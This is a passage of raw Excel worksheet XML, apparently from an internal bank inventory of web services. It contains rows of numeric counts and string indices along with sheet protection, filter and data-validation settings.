        <v>269</v>
      </c>
      <c r="K198" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L198" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M198" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N198" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O198" s="1"/>
      <c r="P198" s="1" t="s">
        <v>250</v>
      </c>
      <c r="Q198" s="1" t="s">
        <v>3673</v>
      </c>
      <c r="R198" s="82">
        <v>1075</v>
      </c>
      <c r="S198" s="82">
        <v>668</v>
      </c>
      <c r="T198" s="82">
        <v>8073</v>
      </c>
      <c r="U198" s="82">
        <v>563366</v>
      </c>
      <c r="V198" s="82">
        <v>320165</v>
      </c>
      <c r="W198" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="199" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A199" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B199" s="51">
        <v>43838.913499305556</v>
      </c>
      <c r="C199" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D199" s="26">
        <v>173</v>
      </c>
      <c r="E199" s="1" t="s">
        <v>3331</v>
      </c>
      <c r="F199" s="26">
        <v>101</v>
      </c>
      <c r="G199" s="57" t="s">
        <v>3332</v>
      </c>
      <c r="H199" s="1" t="s">
        <v>1074</v>
      </c>
      <c r="I199" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J199" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K199" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L199" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M199" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N199" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O199" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="P199" s="1"/>
      <c r="Q199" s="1" t="s">
        <v>3672</v>
      </c>
      <c r="R199" s="82">
        <v>9327</v>
      </c>
      <c r="S199" s="82">
        <v>1034</v>
      </c>
      <c r="T199" s="82">
        <v>677</v>
      </c>
      <c r="U199" s="82">
        <v>1463</v>
      </c>
      <c r="V199" s="82">
        <v>3350</v>
      </c>
      <c r="W199" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="200" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A200" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B200" s="51">
        <v>44109.567792048612</v>
      </c>
      <c r="C200" s="1" t="s">
        <v>3199</v>
      </c>
      <c r="D200" s="26">
        <v>206</v>
      </c>
      <c r="E200" s="1" t="s">
        <v>3331</v>
      </c>
      <c r="F200" s="26">
        <v>104</v>
      </c>
      <c r="G200" s="57" t="s">
        <v>3332</v>
      </c>
      <c r="H200" s="1" t="s">
        <v>3333</v>
      </c>
      <c r="I200" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J200" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K200" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L200" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M200" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N200" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O200" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="P200" s="1" t="s">
        <v>250</v>
      </c>
      <c r="Q200" s="1" t="s">
        <v>3673</v>
      </c>
      <c r="R200" s="82">
        <v>12</v>
      </c>
      <c r="S200" s="82">
        <v>18</v>
      </c>
      <c r="T200" s="82">
        <v>38</v>
      </c>
      <c r="U200" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="V200" s="82" t="e">
        <v>#N/A</v>
      </c>
      <c r="W200" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="201" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A201" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B201" s="51">
        <v>43908.846880520832</v>
      </c>
      <c r="C201" s="1" t="s">
        <v>3334</v>
      </c>
      <c r="D201" s="26">
        <v>120</v>
      </c>
      <c r="E201" s="1" t="s">
        <v>3335</v>
      </c>
      <c r="F201" s="26">
        <v>101</v>
      </c>
      <c r="G201" s="57" t="s">
        <v>3336</v>
      </c>
      <c r="H201" s="1" t="s">
        <v>3337</v>
      </c>
      <c r="I201" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J201" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K201" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L201" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M201" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N201" s="1"/>
      <c r="O201" s="1"/>
      <c r="P201" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="Q201" s="1" t="s">
        <v>3680</v>
      </c>
      <c r="R201" s="82">
        <v>73</v>
      </c>
      <c r="S201" s="82">
        <v>50</v>
      </c>
      <c r="T201" s="82">
        <v>1231</v>
      </c>
      <c r="U201" s="82">
        <v>2055</v>
      </c>
      <c r="V201" s="82">
        <v>2867</v>
      </c>
      <c r="W201" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="202" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A202" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B202" s="51">
        <v>44019.153889895832</v>
      </c>
      <c r="C202" s="1" t="s">
        <v>3339</v>
      </c>
      <c r="D202" s="26">
        <v>202</v>
      </c>
      <c r="E202" s="1" t="s">
        <v>3340</v>
      </c>
      <c r="F202" s="26">
        <v>202</v>
      </c>
      <c r="G202" s="57" t="s">
        <v>3341</v>
      </c>
      <c r="H202" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="I202" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J202" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K202" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L202" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M202" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N202" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O202" s="1" t="s">
        <v>2969</v>
      </c>
      <c r="P202" s="1" t="s">
        <v>250</v>
      </c>
      <c r="Q202" s="1" t="s">
        <v>3681</v>
      </c>
      <c r="R202" s="82">
        <v>211143</v>
      </c>
      <c r="S202" s="82">
        <v>146619</v>
      </c>
      <c r="T202" s="82">
        <v>959799</v>
      </c>
      <c r="U202" s="82">
        <v>1784964</v>
      </c>
      <c r="V202" s="82">
        <v>1886227</v>
      </c>
      <c r="W202" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="203" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A203" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B203" s="51">
        <v>43811.90038146991</v>
      </c>
      <c r="C203" s="1" t="s">
        <v>3343</v>
      </c>
      <c r="D203" s="26">
        <v>100</v>
      </c>
      <c r="E203" s="1" t="s">
        <v>3344</v>
      </c>
      <c r="F203" s="26">
        <v>100</v>
      </c>
      <c r="G203" s="57" t="s">
        <v>3345</v>
      </c>
      <c r="H203" s="1" t="s">
        <v>3346</v>
      </c>
      <c r="I203" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J203" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K203" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L203" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M203" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N203" s="16"/>
      <c r="O203" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P203" s="1"/>
      <c r="Q203" s="1" t="s">
        <v>3682</v>
      </c>
      <c r="R203" s="82">
        <v>26</v>
      </c>
      <c r="S203" s="82">
        <v>21</v>
      </c>
      <c r="T203" s="82">
        <v>137</v>
      </c>
      <c r="U203" s="82">
        <v>209</v>
      </c>
      <c r="V203" s="82">
        <v>201</v>
      </c>
      <c r="W203" s="1" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="204" spans="1:23" ht="15.75" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A204" s="1" t="s">
        <v>3</v>
      </c>
      <c r="B204" s="51">
        <v>44047.508589282406</v>
      </c>
      <c r="C204" s="1" t="s">
        <v>3343</v>
      </c>
      <c r="D204" s="26">
        <v>210</v>
      </c>
      <c r="E204" s="1" t="s">
        <v>3344</v>
      </c>
      <c r="F204" s="26">
        <v>210</v>
      </c>
      <c r="G204" s="57" t="s">
        <v>3345</v>
      </c>
      <c r="H204" s="1" t="s">
        <v>3346</v>
      </c>
      <c r="I204" s="1" t="s">
        <v>185</v>
      </c>
      <c r="J204" s="1" t="s">
        <v>186</v>
      </c>
      <c r="K204" s="1" t="s">
        <v>16</v>
      </c>
      <c r="L204" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M204" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N204" s="1"/>
      <c r="O204" s="1" t="s">
        <v>2601</v>
      </c>
      <c r="P204" s="1" t="s">
        <v>1795</v>
      </c>
      <c r="Q204" s="1" t="s">
        <v>3107</v>
      </c>
      <c r="R204" s="82">
        <v>22100</v>
      </c>
      <c r="S204" s="82">
        <v>16165</v>
      </c>
      <c r="T204" s="82">
        <v>103856</v>
      </c>
      <c r="U204" s="82">
        <v>156387</v>
      </c>
      <c r="V204" s="82">
        <v>181976</v>
      </c>
      <c r="W204" s="1" t="s">
        <v>208</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="dHGe13PjqC2RHirXqOQDe3yUld59+BhAzsP4mHxQU40jUtqnX6yqrR1eS8GQEo78HC88X4+Vd4ptQnG+RiGj/Q==" saltValue="W6OveMjmxyCMujzAjCCj2A==" spinCount="100000" sheet="1" sort="0" autoFilter="0" pivotTables="0"/>
  <autoFilter ref="A1:W204" xr:uid="{2F0A7E24-1236-4896-9B15-F92FA3D65AA6}">
    <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A49:W100">
      <sortCondition ref="E1:E204"/>
    </sortState>
  </autoFilter>
  <dataValidations count="2">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P116:P124 P138:P150 P161 P126:P136" xr:uid="{221D886D-F422-4D91-8232-AFFA69820C35}">
      <formula1>INDIRECT(J116)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="I44:I45 K44:N45 J59:J74 J77:J204 J2:J57" xr:uid="{CA30BAC4-5BC1-4015-8DC4-F3964F43635F}">
      <formula1>INDIRECT(H2)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawing r:id="rId2"/>
  <legacyDrawingHF r:id="rId3"/>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{CCE6A557-97BC-4b89-ADB6-D9C93CAAB3DF}">
      <x14:dataValidations xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" count="2">
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{13A310E0-5EE4-4D27-B8C4-B94A43F7D71B}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>I152:I204 I46:I57 I59:I74 I77:I150 I2:I43</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{1E296C89-347C-4BFA-B992-BF91E6CF68B7}">
          <x14:formula1>
            <xm:f>'D:\DIA DIA\Gobierno WSRR\INFORME\Gobierno Produccion\[Inventario de Servicios  Completo Ver 1 - copia.xlsx]Lista'!#REF!</xm:f>
          </x14:formula1>
          <xm:sqref>I151</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6B241-F6F9-413C-9495-584728B2D783}">
  <sheetPr codeName="Hoja10"/>
  <dimension ref="A1:W386"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="K175" sqref="K175"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="14.90625" customWidth="1"/>
    <col min="2" max="2" width="17.36328125" customWidth="1"/>
    <col min="3" max="3" width="35.36328125" style="42" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="21" customWidth="1"/>
    <col min="5" max="5" width="45.08984375" style="50" customWidth="1"/>
    <col min="6" max="6" width="9" style="50" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="39.453125" style="50" customWidth="1"/>
    <col min="8" max="8" width="33.36328125" customWidth="1"/>
    <col min="9" max="9" width="35.90625" customWidth="1"/>
    <col min="10" max="10" width="37" customWidth="1"/>
    <col min="11" max="11" width="39.453125" customWidth="1"/>
    <col min="12" max="12" width="33.6328125" customWidth="1"/>
    <col min="13" max="14" width="38.08984375" customWidth="1"/>
    <col min="15" max="15" width="16.08984375" customWidth="1"/>
    <col min="16" max="16" width="19" customWidth="1"/>
    <col min="17" max="17" width="21" customWidth="1"/>
    <col min="18" max="18" width="10.08984375" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="10.54296875" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="10.36328125" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="11.08984375" bestFit="1" customWidth="1"/>
    <col min="22" max="23" width="16.08984375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" s="37" t="s">
        <v>1</v>
      </c>
      <c r="B1" s="45" t="s">
        <v>51</v>
      </c>
      <c r="C1" s="45" t="s">
        <v>52</v>
      </c>
      <c r="D1" s="45" t="s">
        <v>53</v>
      </c>
      <c r="E1" s="58" t="s">
        <v>54</v>
      </c>
      <c r="F1" s="39" t="s">
        <v>55</v>
      </c>
      <c r="G1" s="62" t="s">
        <v>56</v>
      </c>
      <c r="H1" s="38" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="38" t="s">
        <v>58</v>
      </c>
      <c r="J1" s="38" t="s">
        <v>59</v>
      </c>
      <c r="K1" s="38" t="s">
        <v>8</v>
      </c>
      <c r="L1" s="38" t="s">
        <v>60</v>
      </c>
      <c r="M1" s="38" t="s">
        <v>61</v>
      </c>
      <c r="N1" s="38" t="s">
        <v>62</v>
      </c>
      <c r="O1" s="38" t="s">
        <v>63</v>
      </c>
      <c r="P1" s="38" t="s">
        <v>64</v>
      </c>
      <c r="Q1" s="40" t="s">
        <v>65</v>
      </c>
      <c r="R1" s="40" t="s">
        <v>66</v>
      </c>
      <c r="S1" s="40" t="s">
        <v>67</v>
      </c>
      <c r="T1" s="40" t="s">
        <v>68</v>
      </c>
      <c r="U1" s="40" t="s">
        <v>69</v>
      </c>
      <c r="V1" s="53" t="s">
        <v>70</v>
      </c>
      <c r="W1" s="38" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B2" s="51">
        <v>44615.792942893517</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D2" s="43">
        <v>1910</v>
      </c>
      <c r="E2" s="1" t="s">
        <v>87</v>
      </c>
      <c r="F2" s="26">
        <v>135</v>
      </c>
      <c r="G2" s="1" t="s">
        <v>88</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>89</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K2" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L2" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M2" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N2" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O2" s="1" t="s">
        <v>92</v>
      </c>
      <c r="P2" s="1" t="s">
        <v>93</v>
      </c>
      <c r="Q2" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R2" s="83">
        <v>7218059</v>
      </c>
      <c r="S2" s="83">
        <v>7597970</v>
      </c>
      <c r="T2" s="83">
        <v>7624365</v>
      </c>
      <c r="U2" s="83">
        <v>20972492</v>
      </c>
      <c r="V2" s="83">
        <v>30546239</v>
      </c>
      <c r="W2" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="3" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A3" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="51">
        <v>44117.594781631946</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>96</v>
      </c>
      <c r="D3" s="43">
        <v>110</v>
      </c>
      <c r="E3" s="1" t="s">
        <v>97</v>
      </c>
      <c r="F3" s="26">
        <v>100</v>
      </c>
      <c r="G3" s="1" t="s">
        <v>98</v>
      </c>
      <c r="H3" s="1" t="s">
        <v>89</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J3" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K3" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L3" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M3" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N3" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O3" s="1"/>
      <c r="P3" s="1"/>
      <c r="Q3" s="1" t="s">
        <v>3493</v>
      </c>
      <c r="R3" s="83">
        <v>49937577</v>
      </c>
      <c r="S3" s="83">
        <v>41672613</v>
      </c>
      <c r="T3" s="83">
        <v>3285668</v>
      </c>
      <c r="U3" s="83">
        <v>53</v>
      </c>
      <c r="V3" s="83">
        <v>22</v>
      </c>
      <c r="W3" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="4" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A4" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B4" s="51">
        <v>44117.59478162037</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>96</v>
      </c>
      <c r="D4" s="43">
        <v>110</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>108</v>
      </c>
      <c r="F4" s="26">
        <v>101</v>
      </c>
      <c r="G4" s="1" t="s">
        <v>109</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>110</v>
      </c>
      <c r="I4" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K4" s="17" t="s">
        <v>15</v>
      </c>
      <c r="L4" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M4" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N4" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O4" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P4" s="1"/>
      <c r="Q4" s="1" t="s">
        <v>3493</v>
      </c>
      <c r="R4" s="83">
        <v>4581</v>
      </c>
      <c r="S4" s="83">
        <v>3</v>
      </c>
      <c r="T4" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U4" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="V4" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="W4" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="5" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A5" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B5" s="51">
        <v>44522.621907337962</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D5" s="43">
        <v>1910</v>
      </c>
      <c r="E5" s="1" t="s">
        <v>112</v>
      </c>
      <c r="F5" s="26">
        <v>112</v>
      </c>
      <c r="G5" s="1" t="s">
        <v>113</v>
      </c>
      <c r="H5" s="1" t="s">
        <v>114</v>
      </c>
      <c r="I5" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J5" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K5" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L5" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M5" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N5" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O5" s="1"/>
      <c r="P5" s="1"/>
      <c r="Q5" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R5" s="83">
        <v>6</v>
      </c>
      <c r="S5" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T5" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U5" s="83">
        <v>6</v>
      </c>
      <c r="V5" s="83">
        <v>403</v>
      </c>
      <c r="W5" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="6" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A6" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B6" s="51">
        <v>44615.792942881948</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D6" s="43">
        <v>1910</v>
      </c>
      <c r="E6" s="1" t="s">
        <v>118</v>
      </c>
      <c r="F6" s="26">
        <v>143</v>
      </c>
      <c r="G6" s="1" t="s">
        <v>119</v>
      </c>
      <c r="H6" s="1" t="s">
        <v>120</v>
      </c>
      <c r="I6" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K6" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L6" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M6" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N6" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O6" s="1" t="s">
        <v>121</v>
      </c>
      <c r="P6" s="1" t="s">
        <v>93</v>
      </c>
      <c r="Q6" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R6" s="83">
        <v>9172</v>
      </c>
      <c r="S6" s="83">
        <v>2808</v>
      </c>
      <c r="T6" s="83">
        <v>2431</v>
      </c>
      <c r="U6" s="83">
        <v>485767</v>
      </c>
      <c r="V6" s="83">
        <v>722877</v>
      </c>
      <c r="W6" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="7" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A7" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B7" s="51">
        <v>44522.621907349538</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D7" s="43">
        <v>1910</v>
      </c>
      <c r="E7" s="1" t="s">
        <v>122</v>
      </c>
      <c r="F7" s="26">
        <v>113</v>
      </c>
      <c r="G7" s="1" t="s">
        <v>123</v>
      </c>
      <c r="H7" s="1" t="s">
        <v>124</v>
      </c>
      <c r="I7" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K7" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L7" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M7" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N7" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O7" s="1" t="s">
        <v>125</v>
      </c>
      <c r="P7" s="1"/>
      <c r="Q7" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R7" s="83">
        <v>3106</v>
      </c>
      <c r="S7" s="83">
        <v>2898</v>
      </c>
      <c r="T7" s="83">
        <v>2524</v>
      </c>
      <c r="U7" s="83">
        <v>2234</v>
      </c>
      <c r="V7" s="83">
        <v>3563</v>
      </c>
      <c r="W7" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="8" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A8" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B8" s="51">
        <v>44615.792942905093</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D8" s="43">
        <v>1910</v>
      </c>
      <c r="E8" s="1" t="s">
        <v>126</v>
      </c>
      <c r="F8" s="26">
        <v>114</v>
      </c>
      <c r="G8" s="1" t="s">
        <v>127</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>128</v>
      </c>
      <c r="I8" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K8" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L8" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M8" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N8" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O8" s="1" t="s">
        <v>92</v>
      </c>
      <c r="P8" s="1" t="s">
        <v>93</v>
      </c>
      <c r="Q8" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R8" s="83">
        <v>2978</v>
      </c>
      <c r="S8" s="83">
        <v>2779</v>
      </c>
      <c r="T8" s="83">
        <v>2425</v>
      </c>
      <c r="U8" s="83">
        <v>2122</v>
      </c>
      <c r="V8" s="83">
        <v>3449</v>
      </c>
      <c r="W8" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="9" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A9" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B9" s="51">
        <v>44522.621907372682</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D9" s="43">
        <v>1910</v>
      </c>
      <c r="E9" s="1" t="s">
        <v>129</v>
      </c>
      <c r="F9" s="26">
        <v>112</v>
      </c>
      <c r="G9" s="1" t="s">
        <v>130</v>
      </c>
      <c r="H9" s="1" t="s">
        <v>131</v>
      </c>
      <c r="I9" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K9" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L9" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M9" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N9" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O9" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P9" s="1"/>
      <c r="Q9" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R9" s="83">
        <v>2964347</v>
      </c>
      <c r="S9" s="83">
        <v>2820676</v>
      </c>
      <c r="T9" s="83">
        <v>2716439</v>
      </c>
      <c r="U9" s="83">
        <v>2794985</v>
      </c>
      <c r="V9" s="83">
        <v>3217680</v>
      </c>
      <c r="W9" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="10" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A10" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B10" s="51">
        <v>44522.621907280096</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>86</v>
      </c>
      <c r="D10" s="43">
        <v>1910</v>
      </c>
      <c r="E10" s="1" t="s">
        <v>133</v>
      </c>
      <c r="F10" s="26">
        <v>122</v>
      </c>
      <c r="G10" s="1" t="s">
        <v>134</v>
      </c>
      <c r="H10" s="1" t="s">
        <v>135</v>
      </c>
      <c r="I10" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J10" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K10" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L10" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M10" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N10" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O10" s="1" t="s">
        <v>136</v>
      </c>
      <c r="P10" s="1"/>
      <c r="Q10" s="1" t="s">
        <v>3492</v>
      </c>
      <c r="R10" s="83">
        <v>7050</v>
      </c>
      <c r="S10" s="83">
        <v>8620</v>
      </c>
      <c r="T10" s="83">
        <v>5797</v>
      </c>
      <c r="U10" s="83">
        <v>4737</v>
      </c>
      <c r="V10" s="83">
        <v>7647</v>
      </c>
      <c r="W10" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="11" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A11" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B11" s="51">
        <v>44159.709903078707</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>143</v>
      </c>
      <c r="D11" s="43">
        <v>100</v>
      </c>
      <c r="E11" s="1" t="s">
        <v>144</v>
      </c>
      <c r="F11" s="26">
        <v>200</v>
      </c>
      <c r="G11" s="1" t="s">
        <v>145</v>
      </c>
      <c r="H11" s="1" t="s">
        <v>146</v>
      </c>
      <c r="I11" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K11" s="32" t="s">
        <v>35</v>
      </c>
      <c r="L11" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M11" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N11" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O11" s="1" t="s">
        <v>150</v>
      </c>
      <c r="P11" s="1"/>
      <c r="Q11" s="1" t="s">
        <v>151</v>
      </c>
      <c r="R11" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S11" s="83">
        <v>41</v>
      </c>
      <c r="T11" s="83">
        <v>754</v>
      </c>
      <c r="U11" s="83">
        <v>12804</v>
      </c>
      <c r="V11" s="83">
        <v>65709</v>
      </c>
      <c r="W11" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="12" spans="1:23" x14ac:dyDescent="0.35">
